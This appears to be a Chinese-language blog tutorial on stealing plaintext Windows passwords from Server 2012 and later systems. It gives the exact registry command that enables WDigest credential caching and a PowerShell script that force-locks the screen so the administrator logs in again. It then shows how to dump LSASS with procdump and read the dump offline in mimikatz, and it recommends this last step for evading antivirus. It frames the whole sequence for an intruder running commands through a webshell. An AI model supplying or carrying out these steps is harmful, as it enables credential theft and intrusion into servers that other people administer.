win2012 怎么读取明文密码呢?
通过修改注册表,然后给予一个锁屏桌面,重新输入密码抓取,大马的话建用大马的CMD命令执行,以下是本地cmd演示
1.执行cmd命令
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
要想复原,只需把1改成0
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
修改注册表之后需要用户注销或者重新登陆之后才会生效
还有办法是快速的,就是强制锁屏,然后管理员重新登陆就要输入密码了,可以新建一个powershell的脚本,报错上传后
执行cmd命令
1.生成脚本名称为 lock-screen.ps1
Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation
2.执行cmd命令
powershell -file lock-screen.ps1
3.把lsass.dmp文件下载放入mimikatz的文件夹中读取
4.依次执行命令
privilege::debug 提升权限
sekurlsa::minidump lsass.dmp 指定文件
sekurlsa::logonpasswords 读取密码
然后就可以读出密码了
总结:
在系统为win10或2012R2以上时,都需要配置注册表并重新登录后才能抓取明文。
优点和缺点:
优点:用procdump导出lsass.dmp后拖回本地抓取密码来规避杀软。
缺点:修改注册表之后,需要重新登录才能生效,可以使用锁屏脚本(锁屏之前,一定要查看管理员是否在线),让管理员重新登录。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容